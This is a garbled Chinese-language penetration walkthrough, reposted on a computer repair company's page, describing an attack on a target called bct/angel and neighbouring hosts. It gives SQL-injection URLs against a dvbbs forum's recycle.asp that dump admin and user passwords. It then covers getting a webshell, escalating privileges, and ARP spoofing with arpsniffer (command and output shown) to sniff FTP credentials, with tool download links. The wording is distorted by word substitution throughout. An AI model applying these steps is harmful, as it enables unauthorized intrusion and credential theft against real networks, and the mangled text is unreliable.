渗透bct/angel
一、踩点:
主站有毛病的几率太小,就不看了,所有起首检测bct地点的网段,探求可以突破的2000/2003的呆板。
一般都应该找bct附近的ip,不然不在一个互换机内。任意扫一下 比如61.139.126.125,这个服务器可以找到一个可以提权的dvbbs.
二、得到webshell
用东西提早台,用接纳站爆后台。转一下linzi的方法:
http://www.xxx.com/bbs/recycle.asp?tablena...dv_bbs1&page=48 爆后台明文暗码
http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆管理员暗码
http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆用户暗码
http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆用户认证暗码
进到后台后,备份就可以得到shell。然后老途径,su提权,运气好的时间jet也不用,
登上3389后用小榕WinArpSpoof扫描一下看在不在列表内,要是在就可以用arp欺骗,不然pass.
三、嗅探
进去间接下载arp欺骗包,http://fsb.47555.net/arp.rar,装一下WinPcap_3_1_beta4,个人以为这个版本最为稳定,兼容性好,比3.1的版本都稳定。然后用arpsniffer,arpsniff堕落的题目不在讨论之列,详情看linzi的贴:
http://www.eviloctal.com/forum/htm_data/9/0506/12077.html
注意:这里嗅弹得端口最好不要用80等流量大的端口,那样容易导致服务器过载重起,因为我们原来不必要arpsniffer给我什么信息。
C:\>arpsniffer.exe 61.139.126.1 61.139.126.215 5654 c:.txt 0
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security at vip dot sina.com
Network Adapter 0: Realtek RTL8139 Family PCI Fast Ethernet NIC
Enable IP Router....OK
Get 61.139.126。1 Hardware Address: 00-11-d8-5e-25-71
Get 61.139.126.215 Hardware Address: 00-50-8d-67-1e-2d
Get 61.139.126.125 Hardware Address: 00-50-8d-67-1d-fd
Spoof 61.139.126.215: Mac of 61.139.126.1 ===> Mac of 61.139.126.125
Spoof 61.139.126.1: Mac of 61.139.126.215 ===> Mac of 61.139.126.125
Begin Sniffer.........
四:分析数据
下载 http://fsb.47555.net/iris.rar 安置后,可以选择嗅探21 也可以经过封包过滤来过滤自己想要得信息,这个就看大家必要了,得到自己必要的数据就行。
然后就可以断开3389,睡一觉,醒来就有内容看了。
以后的提拔权限什么的,都不在本次讨论了。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
